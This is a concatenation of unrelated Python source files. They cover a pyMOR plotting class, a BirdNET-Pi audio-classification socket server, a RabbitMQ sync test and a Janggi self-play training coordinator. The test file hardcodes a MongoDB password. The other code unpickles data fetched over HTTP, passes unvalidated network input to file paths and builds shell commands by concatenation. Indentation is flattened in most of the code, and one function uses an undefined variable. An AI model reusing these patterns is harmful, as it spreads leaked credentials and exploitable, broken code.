provided, in which case a subplot is created for each entry of the tuple. The
lengths of all arrays have to agree.
discretization
Filled in :meth:`pymor.discretizations.DiscretizationBase.visualize` (ignored).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
separate_colorbars
If `True`, use separate colorbars for each subplot.
rescale_colorbars
If `True`, rescale colorbars to data in each frame.
block
If `True`, block execution until the plot window is closed. If `None`, use the
default provided during instantiation.
filename
If specified, write the data to a VTK-file using
:func:`pymor.tools.vtkio.write_vtk` instead of displaying it.
columns
The number of columns in the visualizer GUI in case multiple plots are displayed
at the same time.
"""
assert isinstance(U, VectorArrayInterface) and hasattr(U, 'data') \
or (isinstance(U, tuple) and all(isinstance(u, VectorArrayInterface) and hasattr(u, 'data') for u in U)
and all(len(u) == len(U[0]) for u in U))
if filename:
if not isinstance(U, tuple):
write_vtk(self.grid, U, filename, codim=self.codim)
else:
for i, u in enumerate(U):
write_vtk(self.grid, u, '{}-{}'.format(filename, i), codim=self.codim)
else:
block = self.block if block is None else block
visualize_patch(self.grid, U, bounding_box=self.bounding_box, codim=self.codim, title=title,
legend=legend, separate_colorbars=separate_colorbars, rescale_colorbars=rescale_colorbars,
backend=self.backend, block=block, columns=columns)
class Matplotlib1DVisualizer(BasicInterface):
"""Visualize scalar data associated to a one-dimensional |Grid| as a plot.
The grid's |ReferenceElement| must be the line. The data can either
be attached to the subintervals or vertices of the grid.
Parameters
----------
grid
The underlying |Grid|.
codim
The codimension of the entities the data in `U` is attached to (either 0 or 1).
block
If `True`, block execution until the plot window is closed.
"""
def __init__(self, grid, codim=1, block=False):
assert isinstance(grid, OnedGrid)
assert codim in (0, 1)
self.grid = grid
self.codim = codim
self.block = block
def visualize(self, U, discretization, title=None, legend=None, block=None):
"""Visualize the provided data.
Parameters
----------
U
|VectorArray| of the data to visualize. If `len(U) > 1`, the data is visualized
as a time series of plots. Alternatively, a tuple of |VectorArrays| can be
provided, in which case several plots are made into the same axes. The
lengths of all arrays have to agree.
discretization
Filled in :meth:`pymor.discretizations.DiscretizationBase.visualize` (ignored).
title
Title of the plot.
legend
Description of the data that is plotted. Most useful if `U` is a tuple in which
case `legend` has to be a tuple of strings of the same length.
block
If `True` block execution until the plot window is closed. If `None`, use the
default provided during instantiation.
"""
block = self.block if block is None else block
visualize_matplotlib_1d(self.grid, U, codim=self.codim, title=title, legend=legend, block=block)
|
server.py
|
import socket
import threading
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
os.environ['CUDA_VISIBLE_DEVICES'] = ''
try:
    import tflite_runtime.interpreter as tflite
except ImportError:
    from tensorflow import lite as tflite
import argparse
import operator
import librosa
import numpy as np
import math
import time
from decimal import Decimal
import json
import requests
import sqlite3
import datetime
from time import sleep
import pytz
from tzlocal import get_localzone
from pathlib import Path
import apprise
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind(ADDR)
except:
print("Waiting on socket")
time.sleep(5)
# Open most recent Configuration and grab DB_PWD as a python variable
userDir = os.path.expanduser('~')
with open(userDir + '/BirdNET-Pi/scripts/thisrun.txt', 'r') as f:
this_run = f.readlines()
audiofmt = "." + str(str(str([i for i in this_run if i.startswith('AUDIOFMT')]).split('=')[1]).split('\\')[0])
priv_thresh = float("." + str(str(str([i for i in this_run if i.startswith('PRIVACY_THRESHOLD')]).split('=')[1]).split('\\')[0]))/10
def loadModel():
global INPUT_LAYER_INDEX
global OUTPUT_LAYER_INDEX
global MDATA_INPUT_INDEX
global CLASSES
print('LOADING TF LITE MODEL...', end=' ')
# Load TFLite model and allocate tensors.
modelpath = userDir + '/BirdNET-Pi/model/BirdNET_6K_GLOBAL_MODEL.tflite'
myinterpreter = tflite.Interpreter(model_path=modelpath,num_threads=2)
myinterpreter.allocate_tensors()
# Get input and output tensors.
input_details = myinterpreter.get_input_details()
output_details = myinterpreter.get_output_details()
# Get input tensor index
INPUT_LAYER_INDEX = input_details[0]['index']
MDATA_INPUT_INDEX = input_details[1]['index']
OUTPUT_LAYER_INDEX = output_details[0]['index']
# Load labels
CLASSES = []
labelspath = userDir + '/BirdNET-Pi/model/labels.txt'
with open(labelspath, 'r') as lfile:
for line in lfile.readlines():
CLASSES.append(line.replace('\n', ''))
print('DONE!')
return myinterpreter
def loadCustomSpeciesList(path):
slist = []
if os.path.isfile(path):
with open(path, 'r') as csfile:
for line in csfile.readlines():
slist.append(line.replace('\r', '').replace('\n', ''))
return slist
def splitSignal(sig, rate, overlap, seconds=3.0, minlen=1.5):
# Split signal with overlap
sig_splits = []
for i in range(0, len(sig), int((seconds - overlap) * rate)):
split = sig[i:i + int(seconds * rate)]
# End of signal?
if len(split) < int(minlen * rate):
break
# Signal chunk too short? Fill with zeros.
if len(split) < int(rate * seconds):
temp = np.zeros((int(rate * seconds)))
temp[:len(split)] = split
split = temp
sig_splits.append(split)
return sig_splits
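# Illustrative sketch of the splitter above (example values assumed; this helper is not
# called anywhere): a 10.5 s clip at 48 kHz with overlap=0.0 yields four 3 s chunks of
# 144000 samples; the trailing 1.5 s remainder meets minlen and is zero-padded to 3 s.
def _example_split_signal():
    rate = 48000
    sig = np.zeros(int(10.5 * rate))     # hypothetical 10.5 seconds of silence
    chunks = splitSignal(sig, rate, overlap=0.0)
    return len(chunks), len(chunks[-1])  # -> (4, 144000)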
def readAudioData(path, overlap, sample_rate=48000):
print('READING AUDIO DATA...', end=' ', flush=True)
# Open file with librosa (uses ffmpeg or libav)
sig, rate = librosa.load(path, sr=sample_rate, mono=True, res_type='kaiser_fast')
# Split audio into 3-second chunks
chunks = splitSignal(sig, rate, overlap)
print('DONE! READ', str(len(chunks)), 'CHUNKS.')
return chunks
def convertMetadata(m):
# Convert week to cosine
if m[2] >= 1 and m[2] <= 48:
m[2] = math.cos(math.radians(m[2] * 7.5)) + 1
else:
m[2] = -1
# Add binary mask
mask = np.ones((3,))
if m[0] == -1 or m[1] == -1:
mask = np.zeros((3,))
if m[2] == -1:
mask[2] = 0.0
return np.concatenate([m, mask])
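# Worked example of the metadata encoding above (values assumed): week 1 maps to
# cos(7.5 deg) + 1 ~= 1.99 and week 24 to cos(180 deg) + 1 = 0.0, while week -1
# (unknown) stays -1 and clears its mask bit, so
# convertMetadata(np.array([35.0, -120.0, 24.0])) returns [35.0, -120.0, 0.0, 1.0, 1.0, 1.0].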
def custom_sigmoid(x, sensitivity=1.0):
return 1 / (1.0 + np.exp(-sensitivity * x))
def predict(sample, sensitivity):
global INTERPRETER
# Make a prediction
INTERPRETER.set_tensor(INPUT_LAYER_INDEX, np.array(sample[0], dtype='float32'))
INTERPRETER.set_tensor(MDATA_INPUT_INDEX, np.array(sample[1], dtype='float32'))
INTERPRETER.invoke()
prediction = INTERPRETER.get_tensor(OUTPUT_LAYER_INDEX)[0]
# Apply custom sigmoid
p_sigmoid = custom_sigmoid(prediction, sensitivity)
# Get label and scores for pooled predictions
p_labels = dict(zip(CLASSES, p_sigmoid))
# Sort by score
p_sorted = sorted(p_labels.items(), key=operator.itemgetter(1), reverse=True)
# #print("DATABASE SIZE:", len(p_sorted))
# #print("HUMAN-CUTOFF AT:", int(len(p_sorted)*priv_thresh)/10)
#
# # Remove species that are on blacklist
human_cutoff = max(10,int(len(p_sorted)*priv_thresh))
for i in range(min(10, len(p_sorted))):
if p_sorted[i][0]=='Human_Human':
with open(userDir + '/BirdNET-Pi/HUMAN.txt', 'a') as rfile:
rfile.write(str(datetime.datetime.now())+str(p_sorted[i])+ ' ' + str(human_cutoff)+ '\n')
return p_sorted[:human_cutoff]
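# Note on the cutoff above (a reading of this code, not an official spec): the list
# returned by predict() is truncated to the top max(10, len(p_sorted) * priv_thresh)
# scores, with priv_thresh derived from PRIVACY_THRESHOLD in thisrun.txt, and any
# 'Human_Human' hit inside the top 10 is appended to HUMAN.txt with a timestamp.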
def analyzeAudioData(chunks, lat, lon, week, sensitivity, overlap):
global INTERPRETER
detections = {}
start = time.time()
print('ANALYZING AUDIO...', end=' ', flush=True)
# Convert and prepare metadata
mdata = convertMetadata(np.array([lat, lon, week]))
mdata = np.expand_dims(mdata, 0)
# Parse every chunk
pred_start = 0.0
for c in chunks:
# Prepare as input signal
sig = np.expand_dims(c, 0)
# Make prediction
p = predict([sig, mdata], sensitivity)
# print("PPPPP",p)
HUMAN_DETECTED=False
#Catch if Human is recognized
for x in range(len(p)):
if "Human" in p[x][0]:
HUMAN_DETECTED=True
# Save result and timestamp
pred_end = pred_start + 3.0
#If human detected set all detections to human to make sure voices are not saved
if HUMAN_DETECTED == True:
p=[('Human_Human',0.0)]*10
detections[str(pred_start) + ';' + str(pred_end)] = p
pred_start = pred_end - overlap
print('DONE! Time', int((time.time() - start) * 10) / 10.0, 'SECONDS')
# print('DETECTIONS:::::',detections)
return detections
def sendAppriseNotifications(species,confidence):
if os.path.exists(userDir + '/BirdNET-Pi/apprise.txt') and os.path.getsize(userDir + '/BirdNET-Pi/apprise.txt') > 0:
with open(userDir + '/BirdNET-Pi/scripts/thisrun.txt', 'r') as f:
this_run = f.readlines()
title = str(str(str([i for i in this_run if i.startswith('APPRISE_NOTIFICATION_TITLE')]).split('=')[1]).split('\\')[0]).replace('"', '')
body = str(str(str([i for i in this_run if i.startswith('APPRISE_NOTIFICATION_BODY')]).split('=')[1]).split('\\')[0]).replace('"', '')
if str(str(str([i for i in this_run if i.startswith('APPRISE_NOTIFY_EACH_DETECTION')]).split('=')[1]).split('\\')[0]) == "1":
apobj = apprise.Apprise()
config = apprise.AppriseConfig()
config.add(userDir + '/BirdNET-Pi/apprise.txt')
apobj.add(config)
apobj.notify(
body=body.replace("$sciname",species.split("_")[0]).replace("$comname",species.split("_")[1]).replace("$confidence",confidence),
title=title,
)
def writeResultsToFile(detections, min_conf, path):
print('WRITING RESULTS TO', path, '...', end=' ')
rcnt = 0
with open(path, 'w') as rfile:
rfile.write('Start (s);End (s);Scientific name;Common name;Confidence\n')
for d in detections:
for entry in detections[d]:
if entry[1] >= min_conf and ((entry[0] in INCLUDE_LIST or len(INCLUDE_LIST) == 0) and (entry[0] not in EXCLUDE_LIST or len(EXCLUDE_LIST) == 0) ):
sendAppriseNotifications(str(entry[0]),str(entry[1]));
rfile.write(d + ';' + entry[0].replace('_', ';') + ';' + str(entry[1]) + '\n')
rcnt += 1
print('DONE! WROTE', rcnt, 'RESULTS.')
return
def handle_client(conn, addr):
global INCLUDE_LIST
global EXCLUDE_LIST
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
else:
#print(f"[{addr}] {msg}")
args = type('', (), {})()
args.i = ''
args.o = ''
args.birdweather_id = '99999'
args.include_list = 'null'
args.exclude_list = 'null'
args.overlap = 0.0
args.week = -1
args.sensitivity = 1.25
args.min_conf = 0.70
args.lat = -1
args.lon = -1
for line in msg.split('||'):
inputvars = line.split('=')
if inputvars[0] == 'i':
args.i = inputvars[1]
elif inputvars[0] == 'o':
args.o = inputvars[1]
elif inputvars[0] == 'birdweather_id':
args.birdweather_id = inputvars[1]
elif inputvars[0] == 'include_list':
args.include_list = inputvars[1]
elif inputvars[0] == 'exclude_list':
args.exclude_list = inputvars[1]
elif inputvars[0] == 'overlap':
args.overlap = float(inputvars[1])
elif inputvars[0] == 'week':
args.week = int(inputvars[1])
elif inputvars[0] == 'sensitivity':
args.sensitivity = float(inputvars[1])
elif inputvars[0] == 'min_conf':
args.min_conf = float(inputvars[1])
elif inputvars[0] == 'lat':
args.lat = float(inputvars[1])
elif inputvars[0] == 'lon':
args.lon = float(inputvars[1])
# Load custom species lists - INCLUDED and EXCLUDED
if not args.include_list == 'null':
INCLUDE_LIST = loadCustomSpeciesList(args.include_list)
else:
INCLUDE_LIST = []
if not args.exclude_list == 'null':
EXCLUDE_LIST = loadCustomSpeciesList(args.exclude_list)
else:
EXCLUDE_LIST = []
birdweather_id = args.birdweather_id
# Read audio data
audioData = readAudioData(args.i, args.overlap)
# Get Date/Time from filename in case Pi gets behind
#now = datetime.now()
full_file_name = args.i
print('FULL FILENAME: -' + full_file_name + '-')
file_name = Path(full_file_name).stem
file_date = file_name.split('-birdnet-')[0]
file_time = file_name.split('-birdnet-')[1]
date_time_str = file_date + ' ' + file_time
date_time_obj = datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S')
#print('Date:', date_time_obj.date())
#print('Time:', date_time_obj.time())
print('Date-time:', date_time_obj)
now = date_time_obj
current_date = now.strftime("%Y-%m-%d")
current_time = now.strftime("%H:%M:%S")
current_iso8601 = now.astimezone(get_localzone()).isoformat()
week_number = int(now.strftime("%V"))
week = max(1, min(week_number, 48))
sensitivity = max(0.5, min(1.0 - (args.sensitivity - 1.0), 1.5))
# Process audio data and get detections
detections = analyzeAudioData(audioData, args.lat, args.lon, week, sensitivity, args.overlap)
# Write detections to output file
min_conf = max(0.01, min(args.min_conf, 0.99))
writeResultsToFile(detections, min_conf, args.o)
###############################################################################
###############################################################################
soundscape_uploaded = False
# Write detections to Database
myReturn = ''
for i in detections:
myReturn += str(i) + '-' + str(detections[i][0]) + '\n'
with open(userDir + '/BirdNET-Pi/BirdDB.txt', 'a') as rfile:
for d in detections:
for entry in detections[d]:
if entry[1] >= min_conf and ((entry[0] in INCLUDE_LIST or len(INCLUDE_LIST) == 0) and (entry[0] not in EXCLUDE_LIST or len(EXCLUDE_LIST) == 0) ):
rfile.write(str(current_date) + ';' + str(current_time) + ';' + entry[0].replace('_', ';') + ';' \
+ str(entry[1]) +";" + str(args.lat) + ';' + str(args.lon) + ';' + str(min_conf) + ';' + str(week) + ';' \
+ str(args.sensitivity) +';' + str(args.overlap) + '\n')
Date = str(current_date)
Time = str(current_time)
species = entry[0]
Sci_Name,Com_Name = species.split('_')
score = entry[1]
Confidence = str(round(score*100))
Lat = str(args.lat)
Lon = str(args.lon)
Cutoff = str(args.min_conf)
Week = str(args.week)
Sens = str(args.sensitivity)
Overlap = str(args.overlap)
Com_Name = Com_Name.replace("'", "")
File_Name = Com_Name.replace(" ", "_") + '-' + Confidence + '-' + \
Date.replace("/", "-") + '-birdnet-' + Time + audiofmt
#Connect to SQLite Database
for attempt_number in range(3):
try:
con = sqlite3.connect(userDir + '/BirdNET-Pi/scripts/birds.db')
cur = con.cursor()
cur.execute("INSERT INTO detections VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)", (Date, Time, Sci_Name, Com_Name, str(score), Lat, Lon, Cutoff, Week, Sens, Overlap, File_Name))
con.commit()
con.close()
break
except:
print("Database busy")
time.sleep(2)
print(str(current_date) + ';' + str(current_time) + ';' + entry[0].replace('_', ';') + ';' + str(entry[1]) + ';' + str(args.lat) + ';' + str(args.lon) + ';' + str(min_conf) + ';' + str(week) + ';' + str(args.sensitivity) +';' + str(args.overlap) + Com_Name.replace(" ", "_") + '-' + str(score) + '-' + str(current_date) + '-birdnet-' + str(current_time) + audiofmt + '\n')
if birdweather_id != "99999":
try:
if soundscape_uploaded is False:
# POST soundscape to server
soundscape_url = "https://app.birdweather.com/api/v1/stations/" + birdweather_id + "/soundscapes" + "?timestamp=" + current_iso8601
with open(args.i, 'rb') as f:
wav_data = f.read()
response = requests.post(url=soundscape_url, data=wav_data, headers={'Content-Type': 'application/octet-stream'})
print("Soundscape POST Response Status - ", response.status_code)
sdata = response.json()
soundscape_id = sdata['soundscape']['id']
soundscape_uploaded = True
# POST detection to server
detection_url = "https://app.birdweather.com/api/v1/stations/" + birdweather_id + "/detections"
start_time = d.split(';')[0]
end_time = d.split(';')[1]
post_begin = "{ "
now_p_start = now + datetime.timedelta(seconds=float(start_time))
current_iso8601 = now_p_start.astimezone(get_localzone()).isoformat()
post_timestamp = "\"timestamp\": \"" + current_iso8601 + "\","
post_lat = "\"lat\": " + str(args.lat) + ","
post_lon = "\"lon\": " + str(args.lon) + ","
post_soundscape_id = "\"soundscapeId\": " + str(soundscape_id) + ","
post_soundscape_start_time = "\"soundscapeStartTime\": " + start_time + ","
post_soundscape_end_time = "\"soundscapeEndTime\": " + end_time + ","
post_commonName = "\"commonName\": \"" + entry[0].split('_')[1] + "\","
post_scientificName = "\"scientificName\": \"" + entry[0].split('_')[0] + "\","
post_algorithm = "\"algorithm\": " + "\"alpha\"" + ","
post_confidence = "\"confidence\": " + str(entry[1])
post_end = " }"
post_json = post_begin + post_timestamp + post_lat + post_lon + post_soundscape_id + post_soundscape_start_time + post_soundscape_end_time + post_commonName + post_scientificName + post_algorithm + post_confidence + post_end
print(post_json)
response = requests.post(detection_url, json=json.loads(post_json))
print("Detection POST Response Status - ", response.status_code)
except:
print("Cannot POST right now")
conn.send(myReturn.encode(FORMAT))
#time.sleep(3)
conn.close()
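# Minimal client-side sketch of the wire protocol handled above (this helper is an
# illustration, not part of the original script): a request is a 64-byte ASCII length
# field followed by a '||'-separated key=value payload such as
# "i=/tmp/in.wav||o=/tmp/out.csv||week=20"; the server answers with its detections.
def _example_send_request(message, host=SERVER, port=PORT):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    payload = message.encode(FORMAT)
    header = str(len(payload)).encode(FORMAT)
    header += b' ' * (HEADER - len(header))   # pad the length field to HEADER bytes
    client.send(header)
    client.send(payload)
    reply = client.recv(4096).decode(FORMAT)  # detections echoed back by handle_client
    client.close()
    return reply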
def start():
# Load model
global INTERPRETER, INCLUDE_LIST, EXCLUDE_LIST
INTERPRETER = loadModel()
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
test_sync_with_master.py
|
from radical.entk.utils.sync_initiator import sync_with_master
import pika
from radical.entk import Task, Stage, Pipeline
import radical.utils as ru
import os
from threading import Thread
MLAB = 'mongodb://entk:entk123@ds143511.mlab.com:43511/entk_0_7_4_release'
def syncer(obj, obj_type, queue1, logger, profiler):
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = int(os.environ.get('RMQ_PORT', 5672))
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))
mq_channel = mq_connection.channel()
sync_with_master(obj,
obj_type,
mq_channel,
queue1,
logger,
profiler)
mq_connection.close()
def master(obj, obj_type):
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = int(os.environ.get('RMQ_PORT', 5672))
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, port=port))
mq_channel = mq_connection.channel()
queue1 = 'test-1-2-3' # Expected queue name structure 'X-A-B-C'
queue2 = 'test-3-2-1' # Expected queue name structure 'X-C-B-A'
mq_channel.queue_declare(queue=queue1)
mq_channel.queue_declare(queue=queue2)
logger = ru.Logger('radical.entk.test')
profiler = ru.Profiler('radical.entk.test')
thread1 = Thread(target=syncer, args=(obj, obj_type, queue1, logger, profiler))
thread1.start()
while True:
method_frame, props, body = mq_channel.basic_get(queue=queue1)
if body:
mq_channel.basic_publish(exchange='',
routing_key=queue2,
properties=pika.BasicProperties(correlation_id=props.correlation_id),
body='ack')
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
break
mq_channel.queue_delete(queue=queue1)
mq_channel.queue_delete(queue=queue2)
mq_connection.close()
thread1.join()
def test_utils_sync_with_master():
obj = Task()
obj_type = 'Task'
master(obj, obj_type)
obj = Stage()
obj_type = 'Stage'
master(obj, obj_type)
obj = Pipeline()
obj_type = 'Pipeline'
master(obj, obj_type)
|
JanggiCoach.py
|
import logging
import os
import torch
import sys
from collections import deque
from pickle import Pickler, Unpickler
from random import shuffle
import struct
import numpy as np
from tqdm import tqdm
from JanggiArena import JanggiArena
from JanggiMCTS import JanggiMCTS
import torch.multiprocessing as mp
from torch.multiprocessing import Pool
from time import time, sleep
from janggi.pytorch.NNet import NNetWrapper as nn
from janggi.JanggiGame import JanggiGame as Game
import requests, pickle
import JanggiMainConstants as JMC
from janggi.JanggiConstants import *
from janggi.JanggiLogic import Board
from janggi.JanggiPlayers import *
log = logging.getLogger(__name__)
class JanggiCoach():
"""
This class executes the self-play + learning. It uses the functions defined
in Game and NeuralNet. args are specified in main.py.
"""
def __init__(self, game, nnet, args, selfPlaysPlayed = 0):
self.game = game
self.nnet = nnet
self.args = args
self.trainExamplesHistory = [] # history of examples from args.numItersForTrainExamplesHistory latest iterations
self.skipFirstSelfPlay = False # can be overriden in loadTrainExamples()
self.selfPlaysPlayed = selfPlaysPlayed
@staticmethod
def executeEpisode(eeArgs):
"""
This function executes one episode of self-play, starting with player 1.
As the game is played, each turn is added as a training example to
trainExamples. The game is played till the game ends. After the game
ends, the outcome of the game is used to assign values to each example
in trainExamples.
It uses a temp=1 if episodeStep < tempThreshold, and thereafter
uses temp=0.
Returns:
trainExamples: a list of examples of the form (encodedBoard, pi, v) #(canonicalBoard, currPlayer, pi,v)
pi is the MCTS informed policy vector, v is +1 if
the player eventually won the game, else -1.
"""
game, args, sharedQ, mctsQ, mctsQIdx, nextSelfplayQ, state_dict = eeArgs
trainExamples = []
board = game.getInitBoard()
episodeStep = 0
alternate = 1
# actionList = []
if sharedQ == None:
# nnet = nn(game, state_dict, mctsQIdx)
mcts = JanggiMCTS(game, state_dict, args)
else:
mcts = JanggiMCTS(game, sharedQ, args, True, mctsQ, mctsQIdx)
while True:
episodeStep += 1
encodedBoard = game.encodeBoard(board)
temp = int(episodeStep < args.tempThreshold)
pi = mcts.getActionProb(board, temp=temp)
trainExamples.append([encodedBoard, alternate, pi, None])
alternate = -alternate
action = np.random.choice(len(pi), p=pi)
board = game.getNextState(board, action)
r = game.getGameEnded(board)
if r != 0:
data = [(x[0], x[2], r * x[1]) for x in trainExamples]
if nextSelfplayQ != None:
nextSelfplayQ.put((True, (data, mctsQIdx)))
return data
@staticmethod
def playGame(pgArgs):
"""
Executes one episode of a game.
Returns:
winner: player who won the game (1 if player1, -1 if player2)
"""
game, args, is_rp, is_p1, checkpoint, nextSelfPlayQ = pgArgs
        mcts = JanggiMCTS(game, state_dict, args)
player1 = lambda x: np.argmax(mcts.getActionProb(x, temp=0))
player2 = RandomPlayer(game).play if is_rp else GreedyJanggiPlayer(game).play
if not is_p1:
tmp = player1
player1 = player2
player2 = tmp
players = [player2, None, player1]
curPlayer = 1
board = game.getInitBoard()
it = 0
while game.getGameEnded(board) == 0:
it += 1
action = players[curPlayer + 1](board)
valids = game.getValidMoves(board)
if valids[action] == 0:
log.error(f'Action {action} is not valid! Current player is {curPlayer}')
log.debug(f'valids = {valids}')
assert valids[action] > 0
board = game.getNextState(board, action)
curPlayer *= -1
nextSelfPlayQ.put((False, (checkpoint, is_rp, game.getGameEnded(board) * (1 if is_p1 else -1))))
return 0
@staticmethod
def checkpointSCP(from_path, to_path):
"""
"""
log.info('ACQUIRING LOCK FOR SCP')
can_access = pickle.loads(requests.get(url = JMC.request_base_url+"/acquireLock").content)
while (not can_access):
sleep(10)
can_access = pickle.loads(requests.get(url = JMC.request_base_url+"/acquireLock").content)
os.system("scp "+ from_path + " " + to_path)
requests.get(url = JMC.request_base_url+"/releaseLock")
@staticmethod
def nnProcess(nnProcArgs):
"""
"""
game, updatePipe, sharedQ, gpu_num, queues, checkpoint_folder = nnProcArgs
should_update = False
lastTime = 0
nnet = nn(game, None, gpu_num)
while True:
# Check for nn updates
if updatePipe.poll():
log.info("new checkpoint exists!")
cp_name = updatePipe.recv()
while updatePipe.poll():
cp_name = updatePipe.recv()
log.info("cp_name: "+str(cp_name))
should_update = True
lastTime = time()
# Update NN if possible
if (should_update):
if (time() - lastTime > 1):
lastTime = time()
log.info('ACQUIRING LOCK FOR MOUNTED FOLDER ACCESS')
can_access = pickle.loads(requests.get(url = JMC.request_base_url+"/acquireLock").content)
if (can_access):
should_update = False
with open(JanggiCoach.getSharedStateDictFile(JMC.checkpoint_folder), 'rb') as handle:
state_dict = pickle.load(handle)
nnet.nnet.load_state_dict(state_dict)
log.info('Updated network.')
updatePipe.send(0)
requests.get(url = JMC.request_base_url+"/releaseLock")
else:
log.info('FAILED TO ACQUIRE ACCESS')
# Check for evaluation requests
req = sharedQ.get()
if req == None:
return
else:
# canonicalBoard, pipe = req
canonicalBoard, qIdx = req
s, v = nnet.predict(canonicalBoard)
queues[qIdx].put((s,v))
@staticmethod
def trainingHTTPProcess(rrProcArgs):
"""
"""
dataQ, base_url = rrProcArgs
while True:
# Receive a data point
cnt, data = pickle.loads(requests.get(url = base_url+"/getData").content)
dataQ.put((cnt, data))
sleep(10)
def learn(self):
"""
Performs iterations with numEps episodes of self-play in each
iteration. After every iteration, it retrains neural network with
examples in trainExamples (which has a maximum length of maxlenofQueue).
It then pits the new neural network against the old one and accepts it
only if it wins >= updateThreshold fraction of games.
"""
try:
mp.set_start_method('spawn')
except RuntimeError:
pass
if not self.args.is_training_client:
self.learn_selfplay_client()
else:
self.learn_training_only_client()
def learn_selfplay_client(self):
"""
Process that continuously generates self-play data
"""
manager = mp.Manager()
sharedQ = manager.Queue()
statedict_name = "Default"
# Create num_selfplay_procs queues for sending nn eval results to selfplay procs.
queues = []
for j in range(self.args.num_selfplay_procs):
queues.append(manager.Queue())
# Create num_gpu_procs queues for sending state_dict update info to nn procs.
nn_update_pipes1 = []
nn_update_pipes2 = []
for j in range(self.args.num_gpu_procs):
c1, c2 = mp.Pipe()
nn_update_pipes1.append(c1)
nn_update_pipes2.append(c2)
# Create num_gpu_procs nnProcess
nnProcs = []
for j in range(self.args.num_gpu_procs):
# Run nnProc
nnProc = mp.Process(target=JanggiCoach.nnProcess, args=[(self.game, nn_update_pipes1[j], sharedQ, self.args.gpus_to_use[j%len(self.args.gpus_to_use)], queues, self.args.checkpoint_folder)])
nnProc.daemon = True
nnProc.start()
nnProcs.append(nnProc)
# Create a queue for receiving info of finished jobs
nextSelfplayQ = manager.Queue()
# Create self-play process pool
selfplayPool = Pool(self.args.num_selfplay_procs)
# Run the first num_selfplay_procs process
ibs = pickle.loads(requests.get(url = self.args.request_base_url+"/getIBS").content)
for j in range(self.args.num_selfplay_procs):
selfplayPool.apply_async(JanggiCoach.executeEpisode, [(Game(self.game.c1, self.game.c2, mode = ibs), self.args, sharedQ, queues[j], j, nextSelfplayQ, None)])
# Continuously generate self-plays
while True:
# Check for any network updates
new_sd = pickle.loads(requests.get(url = self.args.request_base_url+"/getSD").content)
if statedict_name != new_sd:
statedict_name = new_sd
sharedStateDictFile = JanggiCoach.getSharedStateDictFile(self.args.remote_checkpoint_folder)
if (self.args.scp_base_url != None):
JanggiCoach.checkpointSCP(self.args.scp_base_url + ":" + sharedStateDictFile, sharedStateDictFile)
for q in nn_update_pipes2:
q.send(statedict_name)
q.recv()
log.info('Alerted the nn procs to update the network')
# Wait for a selfplay result
is_selfplay, q_data = nextSelfplayQ.get()
if is_selfplay:
data, finished_id = q_data
self.selfPlaysPlayed += 1
log.info(str(self.selfPlaysPlayed)+' selfplay games played. Data length = '+str(len(data)))
requests.post(url = self.args.request_base_url+"/postData", data = pickle.dumps(data))
else:
checkpoint, is_rp, did_win = q_data
log.info("Evaluated ("+str(checkpoint)+", "+str(is_rp)+", "+str(did_win)+")")
requests.post(url = self.args.request_base_url+"/uploadEvalRes", data = pickle.dumps((checkpoint, is_rp, did_win)))
# Run new selfplay
ibs = pickle.loads(requests.get(url = self.args.request_base_url+"/getIBS").content)
next_game = pickle.loads(requests.get(url = self.args.request_base_url+"/getNextGame").content)
if next_game == None:
selfplayPool.apply_async(JanggiCoach.executeEpisode, [(Game(self.game.c1, self.game.c2, mode = ibs), self.args, sharedQ, queues[finished_id], finished_id, nextSelfplayQ, None)])
else:
checkpoint, is_rp, is_p1 = next_game
assert False
def learn_training_only_client(self):
"""
Process that only trains the network
"""
untrained_cnt = 0
i = 0
# Load self-plays and train
while True:
i += 1
log.info(f'Starting Iter #{i} ... ({self.selfPlaysPlayed} games played)')
iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)
# Train a lot on the first trial to prevent infinite move masking
if (i == 1):
trainFreq = 0 if self.skipFirstSelfPlay else 100
else:
trainFreq = self.args.trainFrequency
while (untrained_cnt < trainFreq):
# Load self-plays from server
c, d = pickle.loads(requests.get(url = self.args.request_base_url+"/getData").content)
log.info(f'{c} self-play data loaded')
self.selfPlaysPlayed += c
untrained_cnt += c
iterationTrainExamples += d
if (untrained_cnt < trainFreq):
sleep(60)
log.info(f'{untrained_cnt} GAMES LOADED: TRAINING AND SAVING NEW MODEL')
# Add the server-generated examples to the iterationTrainExamples
self.trainExamplesHistory.append(iterationTrainExamples)
untrained_cnt = 0
# Update the trainExamplesHistory
if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:
log.warning(
f"Removing the oldest entry in trainExamples. len(trainExamplesHistory) = {len(self.trainExamplesHistory)}")
self.trainExamplesHistory.pop(0)
# Use at most maxDataCount data points for training
data_cnt = 0
for e in self.trainExamplesHistory:
data_cnt += len(e)
while data_cnt > self.args.maxDataCount:
data_cnt -= len(self.trainExamplesHistory[0])
self.trainExamplesHistory.pop(0)
# backup history to a file every 10 iterations
# NB! the examples were collected using the model from the previous iteration, so (i-1)
if (i % 10 == 0):
self.saveTrainExamples(self.selfPlaysPlayed)
# shuffle examples before training
trainExamples = []
for e in self.trainExamplesHistory:
trainExamples.extend(e)
shuffle(trainExamples)
